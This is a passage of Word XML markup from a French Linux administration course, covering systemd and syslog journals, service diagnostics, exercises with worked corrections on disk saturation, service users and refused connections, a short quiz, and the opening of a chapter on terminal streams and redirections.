          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> centralise les journaux des services ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rsyslog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> écrit dans </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/var/log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>. Les deux se complètent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="LegendeCode"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Six commandes de journaux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journalctl -u nginx --since "1 hour ago"</w:t>
        <w:br/>
        <w:t>journalctl -p err -b            # erreurs depuis le démarrage</w:t>
        <w:br/>
        <w:t>journalctl -f                   # suivi en direct</w:t>
        <w:br/>
        <w:t>journalctl --disk-usage</w:t>
        <w:br/>
        <w:t>journalctl --vacuum-time=14d    # purge</w:t>
        <w:br/>
        <w:br/>
        <w:t>tail -f /var/log/auth.log</w:t>
        <w:br/>
        <w:t>grep -i "failed" /var/log/auth.log | tail -20</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ROTATION</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="100" w:line="316" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Archivage et compression périodiques des journaux pour limiter leur taille. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>logrotate</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> applique une politique par service : taille, fréquence, nombre d'archives conservées.</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DIAGNOSTIC D'UN SERVICE QUI NE DÉMARRE PAS</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systemctl status service</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : état et dernier message.</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journalctl -u service -n 50</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> : contexte complet.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Vérifier la configuration : </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>nginx -t</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>sshd -t</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Vérifier les ports occupés : </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ss -ltnp</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w: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Vérifier les droits du répertoire de travail.</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Unix expose beaucoup de ressources sous forme de fichiers et de flux.</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FHS normalise l'emplacement des fichiers.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processus a un identifiant, un parent et un état.</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SIGTERM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> d'abord, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SIGKILL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> en dernier recours.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droits se lisent propriétaire, groupe, autres.</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777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> masque un problème de propriété et crée une faille.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disque peut être saturé en espace ou en inodes.</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journalctl</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est le point d'entrée des journaux modernes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le système est compris. Le chapitre suivant le met en mouvement : le terminal et les commandes du quotidien.</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47.1 — Diagnostiquer un disque plein</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve">   DIAGNOSTIC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>df -h</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> indique 100 % sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/var</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>du</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ne trouve rien.</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Vérifiez les inodes.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Cherchez les fichiers supprimés encore ouverts.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Corrigez et prévenez.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 47.2 — Créer un utilisateur de service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 service doit tourner sans privilèges avec son propre répertoire.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Utilisateur sans shell de connexion.</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Répertoire de données accessible uniquement à lui.</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Unité systemd associée.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Exercice"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="0F2E4C"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Exercice 47.3 — Analyser une connexion refusée</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Le service écoute mais la connexion échoue.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Vérifiez l'écoute réelle.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Vérifiez le pare-feu local.</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les journaux du service.</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47.1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df -h /var          # espace</w:t>
        <w:br/>
        <w:t>df -i /var          # inodes</w:t>
        <w:br/>
        <w:br/>
        <w:t># Fichiers supprimés mais toujours ouverts par un processus</w:t>
        <w:br/>
        <w:t>lsof +L1 | head</w:t>
        <w:br/>
        <w:t># Redémarrer le service concerné libère l'espace</w:t>
        <w:br/>
        <w:br/>
        <w:t># Si les inodes sont saturés : beaucoup de petits fichiers</w:t>
        <w:br/>
        <w:t>find /var -xdev -type f | wc -l</w:t>
        <w:br/>
        <w:t>find /var -xdev -type f -printf "%h\n" | sort | uniq -c | sort -rn | head</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Un fichier supprimé mais encore ouvert continue d'occuper son inode et ses blocs : l'espace n'est rendu qu'à la fermeture.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>La saturation en inodes vient souvent d'un cache de sessions ou de courriels non purgé.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 47.2</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useradd --system --no-create-home --shell /usr/sbin/nologin app</w:t>
        <w:br/>
        <w:t>install -d -o app -g app -m 750 /var/lib/app</w:t>
        <w:br/>
        <w:br/>
        <w:t># /etc/systemd/system/app.service</w:t>
        <w:br/>
        <w:t>[Unit]</w:t>
        <w:br/>
        <w:t>Description=Application</w:t>
        <w:br/>
        <w:t>After=network.target</w:t>
        <w:br/>
        <w:br/>
        <w:t>[Service]</w:t>
        <w:br/>
        <w:t>User=app</w:t>
        <w:br/>
        <w:t>Group=app</w:t>
        <w:br/>
        <w:t>WorkingDirectory=/var/lib/app</w:t>
        <w:br/>
        <w:t>ExecStart=/opt/app/bin/serveur</w:t>
        <w:br/>
        <w:t>Restart=on-failure</w:t>
        <w:br/>
        <w:br/>
        <w:t>[Install]</w:t>
        <w:br/>
        <w:t>WantedBy=multi-user.target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le compte système n'a pas de shell : une compromission ne donne pas d'accès interactif.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Restart=on-failure</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> couvre les arrêts anormaux, pas les arrêts volontaires.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Corrige"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="E0A21B"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Corrigé 47.3</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ss -ltnp | grep :8080        # écoute sur 127.0.0.1 ou 0.0.0.0 ?</w:t>
        <w:br/>
        <w:t>ss -lx | grep app             # sockets Unix</w:t>
        <w:br/>
        <w:br/>
        <w:t>iptables -L -n -v             # règles IPv4</w:t>
        <w:br/>
        <w:t>nft list ruleset              # nftables</w:t>
        <w:br/>
        <w:br/>
        <w:t>journalctl -u app -n 30 --no-pager</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Une écoute sur </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> n'est joignable que depuis la machine : c'est la cause la plus fréquente d'un service « qui ne répond pas ».</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Le pare-feu et la configuration du service sont deux couches distinctes : les vérifier séparément évite de corriger au hasard.</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Où se trouvent les fichiers de configuration d'un service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/var</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/etc</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/usr</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/tmp</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Quel signal demande un arrêt propre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SIGKILL</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SIGTERM</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SIGSTOP</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SIGHUP</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 xml:space="preserve">Que signifie </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>chmod 755</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pour un répertoire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Personne ne peut entrer</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 propriétaire écrit, les autres lisent et traversent</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Tout le monde peut écrire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 répertoire est masqué</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 xml:space="preserve">Pourquoi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>chmod -R 777</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> est-il une mauvaise pratique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C'est lent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Il ouvre les fichiers à tous et masque un problème de droits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Il supprime les fichiers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Il ne fonctionne pas</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Quelle commande montre les journaux d'un service systemd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dmesg</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journalctl -u service</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tail /etc/log</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systemctl logs</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>/etc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> contient la configuration du système et des services.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>SIGTERM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> peut être capté par le programme pour fermer proprement.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>rwxr-xr-x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> : le propriétaire modifie, le groupe et les autres lisent et traversent.</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Tous les utilisateurs peuvent alors lire et modifier les données.</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>journalctl -u</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> filtre les entrées d'une unité.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:t>48. Le terminal au quotidien</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="40" w:after="200" w:line="372" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:color w:val="274B6D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Redirections, tubes, filtres et recherche : composer des commandes simples pour résoudre des problèmes complexes.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="80" w:line="230" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Durée de travail : 3 h 00 · Niveau : Débutant · Prérequis : chapitre 47</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Maîtriser les trois flux standard et leurs redirections.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Composer des commandes avec les tubes.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Utiliser les filtres de texte essentiels.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Rechercher efficacement dans des fichiers et des arborescences.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Gagner du temps avec l'historique et les alias.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="140" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>48.1 Trois flux</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepLines/>
        <w:widowControl w:val="0"/>
        <w:spacing w:before="0" w:after="150" w:line="348" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F2933"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Chaque programme reçoit une entrée et produit deux sorties : les résultats et les erreurs. Les trois flux sont numérotés et peuvent être redirigés indépendamment.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Legende"/>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:i/>
          <w:color w:val="5B6770"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>Tableau 0.166 — Trois flux et leurs redirections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136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Numéro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Nom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Par défaut</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="245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Redirection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1366"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Entrée standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2322"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Clavier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="136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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="286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Sortie standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="232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Terminal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2458"/>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&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ou </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="274B6D"/>
                <w:sz w:val="17"/>
              </w:rPr>
              <w:t>&gt;&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit w:val="true"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1366"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="0F2E4C"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2868"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="1F2933"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Erreur standard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2322"/>
            <w:tcMar>
              <w:top w:w="66" w:type="dxa"/>
              <w:left w:w="112" w:type="dxa"/>
              <w:bottom w:w="66" w:type="dxa"/>
              <w:right w:w="112" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:before="0" w:after="0" w:line="260" w:lineRule="exact"/>
            </w:pPr>
            <w:r>
